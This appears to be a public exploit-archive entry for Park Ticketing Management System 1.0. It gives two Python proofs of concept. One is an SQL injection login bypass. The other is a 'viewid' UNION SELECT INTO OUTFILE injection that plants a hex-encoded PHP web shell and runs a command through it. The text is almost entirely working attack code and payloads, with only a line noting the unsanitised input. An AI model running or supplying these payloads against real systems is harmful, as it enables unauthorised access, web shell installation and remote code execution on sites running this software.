Park Ticketing Management System 1.0 SQL Injection

Park Ticketing Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. These can be used to bypass login and execute code.


MD5 | cdb2a6a4449ebd4de077e84c9ac8cbca

# Exploit Title: Park Ticketing Management System 1.0  - Authentication Bypass
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:
----------------
/index.php

Vulnerable Code:
-----------------
line 8: $adminuser=$_POST['username'];

Vulnerable Issue:
-----------------
$adminuser=$_POST['username']; has no sanitization

POC User Login:
---------------

URL: http://localhost/ptms/index.php
Username : ' or '1'='1'#
Password : anything


Python POC:
-----------

import requests,re

url = "http://localhost:80/ptms/index.php"

payload = "username=%27+or+%271%27%3D%271%27%23&password=anything&login="
headers = {
"Origin": "http://localhost",
"Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Connection": "close",
"Referer": "http://localhost/ptms/index.php",
"Host": "localhost",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.5",
"Content-Length": "80",
"Content-Type": "application/x-www-form-urlencoded"
}

pattern = "PTMS ADMIN"
response = requests.request("POST", url, data=payload, headers=headers)

if re.findall(pattern,response.text):
print("[+] Authentication bypassed using the following payload : " + payload)

else:
print("[!] Something wrong somewhere")


-------------------
# Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)



import requests
#this script is for POC purpose, you could add your own error checking mechanism
command = "whoami"
url = "http://localhost:80/ptms/view-normal-ticket.php?viewid=1%27%20UNION%20ALL%20SELECT%200x3c3f7068702073797374656d28245f524551554553545b276768316d6175275d293b203f3e,NULL,NULL,NULL,NULL,NULL,NULL%20INTO%20OUTFILE%20%27C:/UwAmp/www/ptms/1.php%27--%20-"

payload = ""
headers = {
"Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Connection": "close",
"Host": "localhost",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.5"
}

response = requests.request("GET", url, data=payload, headers=headers)

print("[+] Injecting Web Shell...\n")

url2 = "http://localhost:80/ptms/1.php?gh1mau=" + command

payload2 = ""
headers2 = {
"Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Connection": "close",
"Host": "localhost",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.5"
}

response2 = requests.request("GET", url2, data=payload2, headers=headers2)

print("Web Shell: " + url2)
print(response2.text)


Related Posts